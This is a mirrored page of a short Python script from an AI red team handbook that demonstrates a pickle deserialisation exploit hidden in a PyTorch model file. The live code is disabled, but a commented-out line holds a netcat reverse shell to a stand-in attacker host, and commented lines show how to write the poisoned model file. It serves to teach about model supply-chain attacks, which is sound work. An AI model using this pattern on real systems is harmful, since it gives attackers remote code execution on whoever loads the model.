mirror of
https://github.com/Shiva108/ai-llm-red-team-handbook.git
synced 2026-02-12 22:52:48 +00:00
39 lines
1013 B
Python
39 lines
1013 B
Python
#!/usr/bin/env python3
|
|
"""
|
|
44.5.1 The Pickle Exploit
|
|
|
|
Source: Chapter_44_Emerging_Threats
|
|
Category: utils
|
|
"""
|
|
|
|
import pickle
|
|
import os
|
|
|
|
import argparse
|
|
import sys
|
|
|
|
class MaliciousModel:
|
|
def __reduce__(self):
|
|
# This command runs when the victim does `torch.load('model.bin')`
|
|
# SECURITY WARNING: The following line is commented out to prevent accidental RCE durng scans.
|
|
# return (os.system, ('nc -e /bin/sh attacker.com 4444',))
|
|
print("[-] RCE payload disabled for security.")
|
|
return (print, ("RCE payload disabled",))
|
|
|
|
# Generating the payload
|
|
# payload = pickle.dumps(MaliciousModel())
|
|
# with open('pytorch_model.bin', 'wb') as f:
|
|
# f.write(payload)
|
|
|
|
|
|
def main():
|
|
"""Command-line interface."""
|
|
parser = argparse.ArgumentParser(description=__doc__)
|
|
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
|
|
args = parser.parse_args()
|
|
|
|
# TODO: Add main execution logic
|
|
pass
|
|
|
|
if __name__ == "__main__":
|
|
main() |